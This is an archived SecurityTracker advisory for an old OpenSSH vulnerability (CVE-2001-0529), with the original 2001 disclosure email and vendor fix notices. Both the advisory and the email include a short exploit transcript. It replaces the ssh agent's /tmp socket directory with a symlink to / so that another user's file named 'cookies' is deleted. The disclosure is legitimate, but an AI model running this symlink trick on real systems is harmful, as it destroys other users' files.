SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Security)  >   OpenSSH Vendors:   OpenSSH.org
OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
SecurityTracker Alert ID:  1001683
SecurityTracker URL:  http://securitytracker.com/id/1001683
CVE Reference:   CVE-2001-0529   (Links to External Site)
Updated:  Apr 26 2004
Original Entry Date:  Jun 5 2001
Impact:   Denial of service via local system, Modification of system information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): openssh-server-2.5.2p2-1.7.2
Description:   A vulnerability has been reported in OpenSSH that allows an authorized user to delete any file on the file system if the file is named "cookies".

A transcript of an exploit scenario is provided below:

[root@clarity /root]# touch /cookies;ls /cookies
/cookies
[root@clarity /root]# ssh zen@localhost
zen@localhost's password:
Last login: Mon Jun 4 20:22:39 2001 from localhost.local
Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
[zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
[zen@clarity zen]$ logout
Connection to localhost closed.
[root@clarity /root]# ls /cookies
/bin/ls: /cookies: No such file or directory

The OpenSSH vendor (www.openssh.org) has reportedly created a patch to address this issue.
Impact:   A local user can delete files named "cookies" in certain directories on the file system.
Solution:   The OpenSSH vendor (www.openssh.org) has reportedly created a patch for OpenSSH to address this issue.
Vendor URL:  www.openssh.org/ (Links to External Site)
Cause:   Access control error
Underlying OS:   Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Additional Information is Provided) Re: OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies   (<zen-parse@gmx.net>)
The author of the original report provides additional information about the version that was tested.
(Vulnerability Cause is Provided) Re: OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies   (sarnold@wirex.com)
A user provides information on the cause of the vulnerability.
(Caldera Issues Fix) OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies   (Support Info <supinfo@caldera.com>)
The vendor has released a fix.
(NetBSD Releases Fix) Re: OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies   (NetBSD Security Officer <security-officer@netbsd.org>)
A fix is available for NetBSD.
(Immunix Issues Fix) OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies   (Immunix Security Team <security@wirex.com>)
The vendor has released a fix.


 Source Message Contents
Date:  Mon, 4 Jun 2001 22:14:29 +1200 (NZST)
Subject:  SSH allows deletion of other users files...


SSH allows deletion of other users files.
=========================================

You can delete any file on the filesystem you want...

as long as its called cookies.


Not really a very useful bug, but could cause annoyances to
people who actually like their cookies.

 /home/zen/.netscape/cookies

sample exploit:-

 [root@clarity /root]# touch /cookies;ls /cookies
 /cookies
 [root@clarity /root]# ssh zen@localhost
 zen@localhost's password:
 Last login: Mon Jun  4 20:22:39 2001 from localhost.local
 Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
 [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
 [zen@clarity zen]$ logout
 Connection to localhost closed.
 [root@clarity /root]# ls /cookies
 /bin/ls: /cookies: No such file or directory


--zen-parse


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC